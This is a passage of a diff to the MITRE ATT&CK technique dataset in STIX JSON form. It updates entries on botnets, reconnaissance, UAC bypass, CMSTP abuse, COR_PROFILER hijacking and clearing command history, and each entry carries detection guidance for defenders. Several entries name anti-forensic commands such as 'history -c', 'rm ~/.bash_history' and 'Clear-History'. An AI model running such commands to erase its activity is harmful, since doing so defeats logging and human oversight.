"modified": "2020-03-27T16:49:15.953Z", + "modified": "2020-08-03T16:47:37.240Z", "created": "2017-05-31T21:30:38.910Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ "macOS", - "Windows" + "Windows", + "Linux" ], "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", "x_mitre_data_sources": [ "File monitoring", "Process monitoring" ], - "x_mitre_version": "2.0" + "x_mitre_version": "2.1" }, { "id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", @@ -2524,6 +2807,11 @@ "external_id": "T1542.003", "url": "https://attack.mitre.org/techniques/T1542/003" }, + { + "external_id": "CAPEC-552", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html" + }, { "source_name": "Mandiant M Trends 2016", "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf", @@ -2553,14 +2841,14 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-05-07T22:32:05.335Z", + "modified": "2020-09-17T19:47:14.338Z", "created": "2019-12-19T21:05:38.123Z", "x_mitre_defense_bypassed": [ "Host intrusion prevention systems", "Anti-virus", "File monitoring" ], - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "Administrator", @@ -2577,6 +2865,108 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.005", + "url": "https://attack.mitre.org/techniques/T1583/005" + }, + { + "source_name": "Norton Botnet", + "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html", + "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020." + }, + { + "source_name": "Imperva DDoS for Hire", + "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/", + "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020." + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Botnet", + "description": "Before compromising a victim, adversaries may buy, lease, or rent a network of compromised systems\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)", + "id": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-05T02:15:01.325Z", + "created": "2020-10-01T00:49:05.467Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.005", + "url": "https://attack.mitre.org/techniques/T1584/005" + }, + { + "source_name": "Norton Botnet", + "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html", + "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020." + }, + { + "source_name": "Imperva DDoS for Hire", + "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/", + "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020." + }, + { + "source_name": "Dell Dridex Oct 2015", + "url": "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Botnet", + "description": "Before compromising a victim, adversaries may compromise numerous third-party systems to form a botnet\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).", + "id": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:03:23.751Z", + "created": "2020-10-01T00:58:35.269Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -2740,7 +3130,7 @@ "phase_name": "credential-access" } ], - "modified": "2020-07-09T17:01:18.302Z", + "modified": "2020-10-21T16:38:27.781Z", "created": "2017-05-31T21:31:22.767Z", "x_mitre_platforms": [ "Linux", @@ -2767,10 +3157,111 @@ "x_mitre_version": "2.1", "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1591.002", + "url": "https://attack.mitre.org/techniques/T1591/002" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Business Relationships", + "description": "Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization\u2019s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim\u2019s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:08:59.209Z", + "created": "2020-10-02T16:27:55.713Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "id": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "name": "Bypass User Account Control", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1088", + "url": "https://attack.mitre.org/techniques/T1088" + }, + { + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "source_name": "TechNet How UAC Works" + }, + { + "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx", + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "source_name": "TechNet Inside UAC" + }, + { + "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx", + "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", + "source_name": "MSDN COM Elevation" + }, + { + "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html", + "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", + "source_name": "Davidson Windows" + }, + { + "url": "https://github.com/hfiref0x/UACME", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "source_name": "Github UACMe" + }, + { + "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "source_name": "enigma0x3 Fileless UAC Bypass" + }, + { + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "source_name": "Fortinet Fareit" + }, + { + "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass", + "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", + "source_name": "SANS UAC Bypass" + }, + { + "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/", + "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", + "source_name": "enigma0x3 sdclt app paths" + }, + { + "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", + "source_name": "enigma0x3 sdclt bypass" + } + ], + "revoked": true, + "type": "attack-pattern", + "modified": "2020-02-05T20:08:32.863Z", + "created": "2017-05-31T21:31:07.462Z" + }, { "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", - "name": "Bypass User Access Control", + "name": "Bypass User Account Control", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -2843,7 +3334,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-25T19:57:54.510Z", + "modified": "2020-07-22T21:36:52.458Z", "created": "2020-01-30T14:24:34.977Z", "x_mitre_platforms": [ "Windows" @@ -2866,75 +3357,46 @@ "Administrator" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_defense_bypassed": [ "Windows User Account Control" ] }, { - "id": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "name": "Bypass User Account Control", "external_references": [ { "source_name": "mitre-attack", - "external_id": "T1088", - "url": "https://attack.mitre.org/techniques/T1088" + "external_id": "T1596.004", + "url": "https://attack.mitre.org/techniques/T1596/004" }, { - "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works", - "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", - "source_name": "TechNet How UAC Works" - }, - { - "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx", - "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", - "source_name": "TechNet Inside UAC" - }, - { - "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx", - "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", - "source_name": "MSDN COM Elevation" - }, - { - "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html", - "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", - "source_name": "Davidson Windows" - }, - { - "url": "https://github.com/hfiref0x/UACME", - "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", - "source_name": "Github UACMe" - }, - { - "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", - "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", - "source_name": "enigma0x3 Fileless UAC Bypass" - }, - { - "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware", - "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", - "source_name": "Fortinet Fareit" - }, - { - "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass", - "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", - "source_name": "SANS UAC Bypass" - }, - { - "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/", - "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", - "source_name": "enigma0x3 sdclt app paths" - }, - { - "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", - "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", - "source_name": "enigma0x3 sdclt bypass" + "source_name": "DigitalShadows CDN", + "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/", + "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed \u2013 How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020." } ], - "revoked": true, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "CDNs", + "description": "Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor\u2019s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization\u2019s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).", + "id": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", "type": "attack-pattern", - "modified": "2020-02-05T20:08:32.863Z", - "created": "2017-05-31T21:31:07.462Z" + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:17:09.684Z", + "created": "2020-10-02T16:59:56.648Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] }, { "id": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", @@ -3024,7 +3486,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "CMSTP", - "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", + "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", "id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "type": "attack-pattern", "kill_chain_phases": [ @@ -3054,7 +3516,7 @@ "x_mitre_permissions_required": [ "User" ], - "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", + "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", "x_mitre_platforms": [ "Windows" ] @@ -3107,7 +3569,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "COR_PROFILER", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "type": "attack-pattern", "kill_chain_phases": [ @@ -3343,6 +3805,21 @@ "source_name": "mitre-attack", "external_id": "T1070.003", "url": "https://attack.mitre.org/techniques/T1070/003" + }, + { + "source_name": "Microsoft PowerShell Command History", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7", + "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020." + }, + { + "source_name": "Sophos PowerShell command audit", + "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit", + "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020." + }, + { + "source_name": "Sophos PowerShell Command History Forensics", + "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics", + "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020." } ], "object_marking_refs": [ @@ -3350,7 +3827,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Clear Command History", - "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nThese logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.", + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the 